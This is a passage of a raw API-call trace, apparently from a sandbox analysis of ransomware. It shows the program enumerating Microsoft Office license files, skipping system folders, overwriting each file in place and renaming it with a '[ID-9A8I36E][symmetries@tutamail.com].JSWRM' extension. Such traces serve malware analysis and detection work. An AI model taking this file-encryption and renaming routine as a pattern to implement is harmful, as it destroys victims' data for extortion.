0x22c7a0 [0107.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0107.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0107.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0107.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0107.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0107.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.778] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11638) returned 1 [0107.778] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0107.778] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0107.780] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.780] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0107.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.780] CloseHandle (hObject=0x45c) returned 1 [0107.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0107.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0107.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0107.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.781] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0107.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0107.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.782] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8e3e493, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8e3e493, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8f2329d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="PROJEC~3.XRM")) returned 1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.782] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.783] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.783] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.783] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0107.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0107.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0107.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0107.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0107.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0107.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0107.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0107.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0107.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.784] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11211) returned 1 [0107.784] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0107.784] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0107.786] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.786] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0107.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.786] CloseHandle (hObject=0x45c) returned 1 [0107.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0107.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0107.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0107.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0107.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0107.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0107.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0107.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0107.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0107.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.788] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8e3e493, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8e3e493, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8f959cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51f7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="PROJEC~2.XRM")) returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.788] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0107.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0107.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0107.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0107.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0107.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0107.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0107.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0107.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0107.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0107.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.789] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20983) returned 1 [0107.789] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51f0) returned 0x24c1d0 [0107.789] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51f0, lpOverlapped=0x0) returned 1 [0107.792] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.792] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51f0, lpOverlapped=0x0) returned 1 [0107.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.792] CloseHandle (hObject=0x45c) returned 1 [0107.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0107.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0107.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0107.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.793] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0107.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0107.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.794] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe91abab2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe91abab2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe926a670, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d8d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="PRE2AF~1.XRM")) returned 1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.794] lstrcmpiW 